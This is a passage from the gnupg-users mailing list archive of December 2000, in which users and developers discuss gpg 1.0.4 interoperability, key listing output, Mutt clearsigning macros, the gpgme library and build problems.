quit Do not do it. Thanks, Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Wed Dec 13 13:15:56 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Wed, 13 Dec 2000 14:15:56 +0100 Subject: public key data output to a file? In-Reply-To: <000b01c06503$c38feab0$2bf8ae8b@bert> References: <000b01c06503$c38feab0$2bf8ae8b@bert> Message-ID: <00121314155601.28035@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday, 13. December 2000 13:54, Stephan Stapel wrote: > Hi! > > Is it possible to output the data of a public key to a file? > These parameters: > > gpg --batch --yes --output [File]--edit-key [ID] pref quit > > Do not do it. Try "gpg --help" or RTFM and look for "export keys"! Regards Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6N3aQqUQWN/hplRsRAkkNAJ40ESVrUEr2mHFrqyeRhZxKDQROnQCfbsG8 3tB1hlnQ6BWNGOJOAzarjhw= =egX5 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Wed Dec 13 13:27:27 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Wed, 13 Dec 2000 14:27:27 +0100 Subject: public key data output to a file? References: <000b01c06503$c38feab0$2bf8ae8b@bert> <00121314155601.28035@atlas> Message-ID: <000f01c06508$7014d0d0$2bf8ae8b@bert> > Try "gpg --help" or RTFM and look for "export keys"! Oh, sorry, if you misunderstood. I don't want to export the key, I know the commands for this. What I'd like to do is to redirect the display of --edit-key [ID] to a file, things like expiration date, trusts, sub keys. That's all. Therefore I included the sniplet (see original posting). No need to be angry Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Wed Dec 13 13:45:24 2000 From: wk@gnupg.org (Werner Koch) Date: Wed, 13 Dec 2000 14:45:24 +0100 Subject: gnupg 1.0.4 <-> 1.0.0 interoperability problem In-Reply-To: <3A376D9C.49D13756@eed.ericsson.se>; from Peter.Bloecher@eed.ericsson.se on Wed, Dec 13, 2000 at 01:37:48PM +0100 References: <3A376D9C.49D13756@eed.ericsson.se> Message-ID: <20001213144524.V21969@gnupg.de> On Wed, 13 Dec 2000, Peter Bloecher (EED) wrote: > After upgrading to gpg 1.0.4 I discovered a problem when exchanging messages > with people using gpg 1.0.0. What happens is that during decryption they are asked Is it the case that the keys of the people using 1.0.0 have neen generated with 1.0.4? Than it is pretty ovious what happens: > Calling gpg 1.0.4 with --list-packets gives > :encrypted data packet: > length: 4294967295 > mdc_method: 2 Since 1.0.3, keys generated with gpg are created with preferences to TWOFISH (and AES since 1.0.4) and that also means that they have the capability to use the new MDC encryption method. This will go into OpenPGP soon and is also suppoted by PGP 7. This new method avoids a (not so new) attack on all email encryption systems. The NEWS for 1.0.3 tell you that there is an incompatibility. > The length field of the encrypted packet looks suspicious, but that does not > have to be connected to the problem. Indeed. It only effects the lising and I will fix it in the next release. > Just upgrading everybody to 1.0.4 does not seem reasonable. I also fear that > there might be interoperability problems with, e.g., PGP. Not if you have the latest PGP (7) - I checked with the PGP developers that MDC works for both of us. As workaround I can suggest to add disable-cipher-algo RIJNDAEL disable-cipher-algo TWOFISH to the options file of gpg 1.0.4. Or foce the use of one cipher without caring about any preferences by using: cipher-algo cast5 IIRC, there is something about it in the FAQ. For security reasons, I'd suggest to upgrade to 1.0.4 anyway. Hth, Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Wed Dec 13 13:47:43 2000 From: wk@gnupg.org (Werner Koch) Date: Wed, 13 Dec 2000 14:47:43 +0100 Subject: public key data output to a file? In-Reply-To: <000b01c06503$c38feab0$2bf8ae8b@bert>; from stephan.stapel@tu-clausthal.de on Wed, Dec 13, 2000 at 01:54:00PM +0100 References: <000b01c06503$c38feab0$2bf8ae8b@bert> Message-ID: <20001213144743.W21969@gnupg.de> On Wed, 13 Dec 2000, Stephan Stapel wrote: > Is it possible to output the data of a public key to a file? > These parameters: > > gpg --batch --yes --output [File]--edit-key [ID] pref quit I am not sure whether you can get the preferences easily. As a workaround you might want to do a --list-packets on the key and parse that output. It seems like a good idea to add this to the listing. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Wed Dec 13 14:12:53 2000 From: wk@gnupg.org (Werner Koch) Date: Wed, 13 Dec 2000 15:12:53 +0100 Subject: public key data output to a file? In-Reply-To: <000f01c06508$7014d0d0$2bf8ae8b@bert>; from stephan.stapel@tu-clausthal.de on Wed, Dec 13, 2000 at 02:27:27PM +0100 References: <000b01c06503$c38feab0$2bf8ae8b@bert> <00121314155601.28035@atlas> <000f01c06508$7014d0d0$2bf8ae8b@bert> Message-ID: <20001213151253.Z21969@gnupg.de> Hi forgot to mention this: script(1) and awk(1) are your friends Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Peter.Bloecher@eed.ericsson.se Wed Dec 13 15:50:01 2000 From: Peter.Bloecher@eed.ericsson.se (Peter Bloecher (EED)) Date: Wed, 13 Dec 2000 16:50:01 +0100 Subject: gnupg 1.0.4 <-> 1.0.0 interoperability problem References: <3A376D9C.49D13756@eed.ericsson.se> <20001213144524.V21969@gnupg.de> Message-ID: <3A379AA9.834BB4EE@eed.ericsson.se> Hello Werner (CC all), Werner Koch wrote: > Is it the case that the keys of the people using 1.0.0 have neen > generated with 1.0.4? Than it is pretty ovious what happens: Not really. I think I actually did that for the example, but the key of the person who encountered the problem was definitely generated with 1.0.0 (since they do not have 1.0.4, which is why we have the problem). > > > Calling gpg 1.0.4 with --list-packets gives > > > :encrypted data packet: > > length: 4294967295 > > mdc_method: 2 > > Since 1.0.3, keys generated with gpg are created with preferences to > TWOFISH (and AES since 1.0.4) and that also means that they have the > capability to use the new MDC encryption method. This will go into > OpenPGP soon and is also suppoted by PGP 7. This new method avoids > a (not so new) attack on all email encryption systems. > > The NEWS for 1.0.3 tell you that there is an incompatibility. Sorry for not reading that. I dug around for a while in the newsgroup and the BUG list. > > > The length field of the encrypted packet looks suspicious, but that does not > > have to be connected to the problem. > > Indeed. It only effects the lising and I will fix it in the next > release. Fine. > > > Just upgrading everybody to 1.0.4 does not seem reasonable. I also fear that > > there might be interoperability problems with, e.g., PGP. > > Not if you have the latest PGP (7) - I checked with the PGP > developers that MDC works for both of us. If I decode this correctly: The problem is caused by pgp 1.0.4 using an encryption method (?) called MDC, which is not supported by 1.0.0. Correct? For some reason, that method was used even when I encrypted with a key that was generated with gpg 1.0.0. Right? [The preferences for that key are: S10 S4 S3 H3 H2 Z2 Z1] > > As workaround I can suggest to add > > disable-cipher-algo RIJNDAEL > disable-cipher-algo TWOFISH > > to the options file of gpg 1.0.4. Or foce the use of one cipher > without caring about any preferences by using: > > cipher-algo cast5 That seems to work. Thanks a lot for your help. (and I will continue to ask the other people to upgrade ;-) ) > > IIRC, there is something about it in the FAQ. For security reasons, > I'd suggest to upgrade to 1.0.4 anyway. I did not find anything in the FAQ. Best regards, /Peter -- Peter Bloecher, Ericsson Research Speech & Signal Processing Ericsson Eurolab Deutschland GmbH Tel: +49 911 5217-307 Nordostpark 12 Fax: +49 911 5217-961 D-90411 Nuernberg mailto:Peter.Bloecher@eed.ericsson.se -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Wed Dec 13 16:00:42 2000 From: rich@cnylug.org (Rich) Date: Wed, 13 Dec 2000 11:00:42 -0500 Subject: Error message Message-ID: <3A379D2A168.3FA1RICH@mail.dreamscape.com> Hi Werner, I grabbed that Cyngin version of GPG and have been fooling around with it, and I keep getting this error message: --------- gpg: can't mmap pool of 16384 bytes: Invalid argument - using malloc --------- The program sill functioned however. I figured I'd mention it in case you had any info for him regarding this. Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Wed Dec 13 17:29:20 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Wed, 13 Dec 2000 18:29:20 +0100 (CET) Subject: Problems with gnupg In-Reply-To: Message-ID: On Wed, 13 Dec 2000, Eduardo Sánchez wrote: > gpg: invalid radix64 character 00 skipped > Thats what I get: gpg: encrypted with ELG-E key, ID 76C3AFBB gpg: no secret key for decryption available gpg: decryption failed: secret key not available So for me it's ok. Make sure your client progs are configured properly and you don't introduce some unwanted whitespace, linebreak characters, or whatever. HTH, Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Wed Dec 13 18:04:40 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Wed, 13 Dec 2000 19:04:40 +0100 Subject: public key data output to a file? References: <000b01c06503$c38feab0$2bf8ae8b@bert> <20001213144743.W21969@gnupg.de> Message-ID: <001d01c0652f$2a0346e0$2bf8ae8b@bert> > > Is it possible to output the data of a public key to a file? > > gpg --batch --yes --output [File]--edit-key [ID] pref quit > I am not sure whether you can get the preferences easily. As a > workaround you might want to do a --list-packets on the key and > parse that output. It seems like a good idea to add this to the > listing. Sorry, but could you please (no RTFM please :-))= ) tell me how to use the list-packets command? And for this list, why can't I simply redirect the output to a file: gpg --batch --edit-key [ID] pref quit 1> c:\test.txt This would do it for me! cheers, Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bkeitch@ow61.openworld.co.uk Wed Dec 13 18:10:29 2000 From: bkeitch@ow61.openworld.co.uk (Ben Keitch) Date: Wed, 13 Dec 2000 18:10:29 GMT Subject: Possible bug? Message-ID: <200012131810.SAA19368@ow61.openworld.co.uk> Please CC me, as I am not on your list. We have just upgraded to 1.0.4 and have noticed the following warning: gpg: this cipher algorithm is depreciated; please use a more standard one! This only occurs on encryption with a key generated with a local copy of gpg. Using a key generated with another copy of gpg-1.0.4 on another (reasonably identical) machine doesn't cause this problem. Firstly what does this warning mean? Unfortunatley we can not use gpg with this warning occuring, as it breaks our scripts. Secondly why does it only occur in the manner described? My only thought is that the signing process is what is causing this warning. We run on Slackware 7.0 Linux on Intel 386. I can send you any other information you need, but I don't know what is relevant. We are using Diffie Hellman keys i.e. ElGamal. In the mean time we are having to use gpg-1.0.1 as it is the last working version. Thank you in advance for your help. Ben Keitch Open World Developer -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bryan@bryansweb.com Wed Dec 13 19:37:41 2000 From: bryan@bryansweb.com (Bryan K. Walton) Date: Wed, 13 Dec 2000 13:37:41 -0600 Subject: question regarding gnupg in my regular signature In-Reply-To: <200012131845.eBDIj0705197@mail.hsp.de>; from gnupg-users-request@gnupg.org on Wed, Dec 13, 2000 at 07:45:00PM +0100 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> Message-ID: <20001213133740.A31330@berbee.com> Greetings to the list. I am relatively new to GPG and am trying to get it configured with Mutt like I want it. I have a question regarding adding my GPG signature to my regular email signature (such as below). Is it Ok to do this? Do many people do this? Are there any negatives to doing this? I have noticed that if I sign my emails, using the Mutt autosign feature, that some folks using email programs like Eudora receive my gpg signature in the form of an attachment that their email program doens't know how to read. What is the real difference between signing my emails, and just sending a copy of my signature in the email signature line? I hope that my question makes sense. Thanks, Bryan Walton -- Bryan K. Walton Network Operations Center Analyst Berbee 5520 Research Park Drive Madison, Wisconsin 53711 608.288.4000 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rodneyp@utanet.at Wed Dec 13 23:33:02 2000 From: rodneyp@utanet.at (Rod Pike) Date: Wed, 13 Dec 2000 21:33:02 -0200 Subject: How to subscribe to this mailing list. Message-ID: <3A38072E.6F03305F@utanet.at> Sorry for the dumb question but could someone CC me with the details on how to subscribe. Cheers, -- Rod Pike rodneyp @ utanet.at -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bryan@bryansweb.com Wed Dec 13 20:36:55 2000 From: bryan@bryansweb.com (Bryan K. Walton) Date: Wed, 13 Dec 2000 14:36:55 -0600 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001213133740.A31330@berbee.com>; from bryan@bryansweb.com on Wed, Dec 13, 2000 at 01:37:41PM -0600 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> <20001213133740.A31330@berbee.com> Message-ID: <20001213143655.B31330@berbee.com> OK, more research has helped me to understand what I am looking for. I think what I am wanting to do is send "clearsign" my emails. Now, if I can only figure out how to get Mutt to do this automatically. Thanks, Bryan On Wed, Dec 13, 2000 at 01:37:41PM -0600, Bryan K. Walton wrote: > Greetings to the list. I am relatively new to GPG and am trying to get it configured with Mutt like I want it. I have a question regarding adding my GPG signature to my regular email signature (such as below). Is it Ok to do this? Do many people do this? Are there any negatives to doing this? I have noticed that if I sign my emails, using the Mutt autosign feature, that some folks using email programs like Eudora receive my gpg signature in the form of an attachment that their email program doens't know how to read. > What is the real difference between signing my emails, and just sending a copy of my signature in the email signature line? > I hope that my question makes sense. > > Thanks, > Bryan Walton > > -- > Bryan K. Walton > Network Operations Center Analyst > Berbee > 5520 Research Park Drive Madison, Wisconsin 53711 > 608.288.4000 > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org -- Bryan K. Walton Network Operations Center Analyst Berbee 5520 Research Park Drive Madison, Wisconsin 53711 608.288.4000 Berbee...putting the E in business -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From hap@rumms.uni-mannheim.de Wed Dec 13 21:15:10 2000 From: hap@rumms.uni-mannheim.de (dollhopf) Date: Wed, 13 Dec 2000 22:15:10 +0100 (MET) Subject: keyserver portnumber Message-ID: <200012132115.eBDLFAM12436@rumms.uni-mannheim.de> (how) can I tell gpg if the keyserver portnumber is not default? does something exist like `gpg --keyserver testwwwkeys --port 1389 ...' ? peter -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Wed Dec 13 21:41:01 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Wed, 13 Dec 2000 21:41:01 +0000 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001213143655.B31330@berbee.com>; from bryan@bryansweb.com on Wed, Dec 13, 2000 at 02:36:55PM -0600 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> <20001213133740.A31330@berbee.com> <20001213143655.B31330@berbee.com> Message-ID: <20001213214101.A264@mcdonald.org.uk> --ikeVEW9yuYc//A+q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Dec 13, 2000 at 02:36:55PM -0600, Bryan K. Walton wrote: > OK, more research has helped me to understand what I am looking for.=20 > I think what I am wanting to do is send "clearsign" my emails. Now, > if I can only figure out how to get Mutt to do this automatically. mutt usually creates PGP/MIME format mail when using pgp/gpg. This is the best method to use. However, few mailers support it at the moment. mutt also supports the older application/pgp format. Putting: set pgp_create_traditional=3Dask-no in you .muttrc will get mutt to ask you whether you want PGP/MIME or application/pgp, defaulting in this case to PGP/MIME. However, some mailers still get confused by this and think the whole mail is an attachment (since it is of type application/pgp). For sending mail to such people (e.g. Outlook with the PGP plugin) I have two macros which can sign and sign/encrypt the body of an e-mail (bound to S and N respectively). These can be run from the compose screen just before sending the mail. # macros for very broken mailers that want pgp data as text/plain macro compose S "Fgpg --no-verbose --clearsign --armor\ny" "GPG sign as text/plain" macro compose N "Fgpg --no-verbose -v -o - --encrypt --sign --textmode --armor --always-trust\ny" "GPG encrypt as text/plain" These work, but are a bit of a cludge compared to mutt's proper PGP support. Has anybody got a better version of these? HTH, Andrew --=20 Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ --ikeVEW9yuYc//A+q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6N+zt/LupyPLe7TYRAnK5AJ98TmfskBNDBYlpftfNx4BY0DFV5QCeP8dX 0YJzI0YhwPNQk/W+oWkWP1w= =SSvC -----END PGP SIGNATURE----- --ikeVEW9yuYc//A+q-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Wed Dec 13 23:16:46 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Wed, 13 Dec 2000 23:16:46 GMT Subject: question regarding gnupg in my regular signature In-Reply-To: <20001213214101.A264@mcdonald.org.uk> References: <20001213143655.B31330@berbee.com> <20001213214101.A264@mcdonald.org.uk> Message-ID: <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Andrew McDonald, On 13 December 2000, I received the following message from you regarding "question regarding gnupg in my regular signature" AM> These work, but are a bit of a cludge compared to mutt's proper PGP AM> support. This implies Mutt invokes PGP "properly" by PGP/MIME and earlier in your posting you referred to "broken mailers" that clearsigned text. Under Linux, the de facto standard *may* be the way in which Mutt defaults for the use of PGP, but in Windows most PGP compliant MUAs *do not* default to PGP/MIME and neither PGP nor GnuPG have any inherant PGP/MIME capability. So what might be "proper" in one environment certainly is not necessarily "proper" in another. I grant you that *if* you are going to send a message from one environment by PGP/MIME that message must be able to be verified and decrypted in another environment, or it will be applications under each OS talking to themselves. There is a standard, RFC2015, but under Windows there are only one or two MUAs to my knowledge which support this. For this reason it is better to clearsign messages to overcome this. Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 13 December 2000 23:06:27 -----BEGIN PGP SIGNATURE----- Version: PGPB2 version 0.01.3 iQA/AwUBOjgDVS7i2PqZ2xC9EQIGowCdHPwHei6Kb8YrqpMFuuRIYHm88M0An04j AtTKH8rpG8UvgYrfjTpw1DFb =1yW5 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From les@mail.dmalabs.com Wed Dec 13 23:51:26 2000 From: les@mail.dmalabs.com (les) Date: Wed, 13 Dec 2000 15:51:26 -0800 Subject: is there a libgnupg Message-ID: <4.3.2.7.0.20001213154120.00b351f0@mail.dmalabs.com> Hello, I am not on the list, so if you could cc me it would be much appreciated. I am just wondering if there is a library for gnupg that developers could use within their own programs? thank you les vanexel -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 08:24:11 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 09:24:11 +0100 Subject: is there a libgnupg In-Reply-To: <4.3.2.7.0.20001213154120.00b351f0@mail.dmalabs.com>; from les@mail.dmalabs.com on Wed, Dec 13, 2000 at 03:51:26PM -0800 References: <4.3.2.7.0.20001213154120.00b351f0@mail.dmalabs.com> Message-ID: <20001214092411.J21969@gnupg.de> On Wed, 13 Dec 2000, les wrote: > Hello, I am not on the list, so if you could cc me it would be much > appreciated. I am just wondering if there is a library for gnupg that > developers could use within their own programs? ftp://ftp.guug.de/pub/gcrypt/alpha/gpgme or see http://cvs.guug.de Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Thu Dec 14 08:39:33 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Thu, 14 Dec 2000 09:39:33 +0100 (CET) Subject: is there a libgnupg In-Reply-To: <4.3.2.7.0.20001213154120.00b351f0@mail.dmalabs.com> References: <4.3.2.7.0.20001213154120.00b351f0@mail.dmalabs.com> Message-ID: <14904.34629.752054.648326@barber.fmi.uni-passau.de> >>>"l" == les writes: l> Hello, I am not on the list, so if you could cc me it would be much l> appreciated. I am just wondering if there is a library for gnupg that l> developers could use within their own programs? You should have looked at the FAQ before posting. Question 4.15 is for you. Regards, Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 10:09:15 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 11:09:15 +0100 Subject: Error message In-Reply-To: <3A379D2A168.3FA1RICH@mail.dreamscape.com>; from rich@cnylug.org on Wed, Dec 13, 2000 at 11:00:42AM -0500 References: <3A379D2A168.3FA1RICH@mail.dreamscape.com> Message-ID: <20001214110915.L21969@gnupg.de> On Wed, 13 Dec 2000, Rich wrote: > gpg: can't mmap pool of 16384 bytes: Invalid argument - using malloc mmap(2) can't allocate memory for some reason the memory allocator falls back using malloc. No problem under Windows, becuase there is no such thing as locked memory. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From daniele@ripe.net Thu Dec 14 10:58:28 2000 From: daniele@ripe.net (Daniele Arena) Date: Thu, 14 Dec 2000 11:58:28 +0100 (CET) Subject: --ignore-crc-error (Was: Re: GnuPG fails to import some PGP keys) In-Reply-To: <20001019181338.P20744@gnupg.de> Message-ID: Hi Werner, I just came back on my original key-loading problem after almost two months; you said you would implement the option "--ignore-crc-error", but I just checked out gnupg from CVS and didn't find it. Am I just dumb or did you change your mind? Cheers, Daniele. On Thu, 19 Oct 2000, Werner Koch wrote: > > > The CRC does make sense to protect against transmission errors but > > > there is no cryptograhic reason why it is needed. Two solutions: > > > > > > a) Write a utility to regenerate the CRC > > > b) Implement --ignore-crc-error in gpg > > > > > > Probably you want me to implement solution b - should not be a > > > problem. > > > > If you could implement the b), that would be great. > > Done - will show up in the CVS soon. -------------------------------------------------------------------------- Daniele Arena RIPE NCC - Database Group phone : +31 20 535 4444 Singel 258 fax : +31 20 535 4445 1016AB Amsterdam e-mail : daniele@ripe.net The Netherlands -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 14 11:09:21 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 14 Dec 2000 12:09:21 +0100 Subject: --ignore-crc-error (Was: Re: GnuPG fails to import some PGP keys) In-Reply-To: ; from daniele@ripe.net on Thu, Dec 14, 2000 at 11:58:28AM +0100 References: <20001019181338.P20744@gnupg.de> Message-ID: <20001214120921.O21969@gnupg.de> Hi! On Thu, 14 Dec 2000, Daniele Arena wrote: > months; you said you would implement the option "--ignore-crc-error", but > I just checked out gnupg from CVS and didn't find it. Am I just dumb or > did you change your mind? You probably checked out the head revision which is the development branch and not all new stuff from stable have been froward-fported. Do a fresh checkout: cvs -d ... checkout -r STABLE-BRANCH-1-0 gnupg or have a look a ftp.gnupg.org/pub/gcrypt/devel/gnupg-1.0.4b.tar.gz Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From daniele@ripe.net Thu Dec 14 12:08:34 2000 From: daniele@ripe.net (Daniele Arena) Date: Thu, 14 Dec 2000 13:08:34 +0100 (CET) Subject: --ignore-crc-error (Was: Re: GnuPG fails to import some PGP keys) In-Reply-To: <20001214120921.O21969@gnupg.de> Message-ID: On Thu, 14 Dec 2000, Werner Koch wrote: > You probably checked out the head revision which is the development > branch and not all new stuff from stable have been froward-fported. > Do a fresh checkout: > > cvs -d ... checkout -r STABLE-BRANCH-1-0 gnupg > > or have a look a ftp.gnupg.org/pub/gcrypt/devel/gnupg-1.0.4b.tar.gz OK, so I'm dumb.:) Thanks a lot! Cheers, Daniele. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From nneul@umr.edu Thu Dec 14 14:28:46 2000 From: nneul@umr.edu (Nathan Neulinger) Date: Thu, 14 Dec 2000 08:28:46 -0600 Subject: bug - HP/UX 10.20 compile of gnupg fails Message-ID: <3A38D91D.4B96286C@umr.edu> If I build without --disable-asm, it give errors about invalid syscalls when running gpg. If I build with --disable-asm, it gets a undefined symbol __udiv_qrnnd at link time. It built just fine on HP/UX 11.00. This occurs with HP's C compiler as well as gcc (2.96 20000712). -- Nathan ------------------------------------------------------------ Nathan Neulinger EMail: nneul@umr.edu University of Missouri - Rolla Phone: (573) 341-4841 Computing Services Fax: (573) 341-4216 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bryan@bryansweb.com Thu Dec 14 15:25:06 2000 From: bryan@bryansweb.com (Bryan K. Walton) Date: Thu, 14 Dec 2000 09:25:06 -0600 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001213133740.A31330@berbee.com>; from bryan@bryansweb.com on Wed, Dec 13, 2000 at 01:37:41PM -0600 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> <20001213133740.A31330@berbee.com> Message-ID: <20001214092506.B7654@berbee.com> Hi, I would first like to thank Graham, Brian, and Andrew for their responses to my question regarding clearsigning my emails. As you can see, this message is clearsigned. Now, I what I would like to do is configure Mut so that it will clearsign automatically. I know there is a way to autosign in PGP/MIME format. But I am having trouble getting it to autosign in clearsign format. I am using Mutt 1.2.5i. I tried adding "set pgp_create_traditional=yes" to my .muttrc but that didn't work. I am also sending this message to the mutt-users list. Thanks! Bryan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From walton@berbee.com Thu Dec 14 15:30:03 2000 From: walton@berbee.com (walton@berbee.com) Date: Thu, 14 Dec 2000 09:30:03 -0600 Subject: Question regarding clearsigning emails automatically Message-ID: <20001214093003.C7654@berbee.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I would first like to thank Graham, Brian, and Andrew for their responses to my question regarding clearsigning my emails. As you can see, this message is clearsigned. Now, I what I would like to do is configure Mut so that it will clearsign automatically. I know there is a way to autosign in PGP/MIME format. But I am having trouble getting it to autosign in clearsign format. I am using Mutt 1.2.5i. I tried adding "set pgp_create_traditional=yes" to my .muttrc but that didn't work. I am also sending this message to the mutt-users list. Thanks! Bryan -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjo453gACgkQ+bU2CMlTTuqx7gCgroT9Fe3a7u4yTbxVn6kOVJd4 iXMAn1T4zpSzWy56qx+lmKPt12Kvjh+V =QBJq -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bryan@bryansweb.com Thu Dec 14 15:38:27 2000 From: bryan@bryansweb.com (Bryan K. Walton) Date: Thu, 14 Dec 2000 09:38:27 -0600 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001214092506.B7654@berbee.com>; from bryan@bryansweb.com on Thu, Dec 14, 2000 at 09:25:06AM -0600 References: <20001213124142.C31174@berbee.com> <200012131842.eBDIg2Y05044@mail.hsp.de> <20001213124440.D31174@berbee.com> <200012131845.eBDIj0705197@mail.hsp.de> <20001213133740.A31330@berbee.com> <20001214092506.B7654@berbee.com> Message-ID: <20001214093827.E7654@berbee.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 OK, So I forgot to clearsign the previous message. All the more reason why I want to automate this part of the process. Thanks, Bryan On Thu, Dec 14, 2000 at 09:25:06AM -0600, Bryan K. Walton wrote: > Hi, > I would first like to thank Graham, Brian, and Andrew for their responses to my question regarding clearsigning my emails. As you can see, this message is clearsigned. > Now, I what I would like to do is configure Mut so that it will clearsign automatically. I know there is a way to autosign in PGP/MIME format. But I am having trouble getting it to autosign in clearsign format. I am using Mutt 1.2.5i. I tried adding "set pgp_create_traditional=yes" to my .muttrc but that didn't work. I am also sending this message to the mutt-users list. > > Thanks! > Bryan > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org - -- Bryan K. Walton Network Operations Center Analyst Berbee 5520 Research Park Drive Madison, Wisconsin 53711 608.288.4000 Berbee...putting the E in business -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see 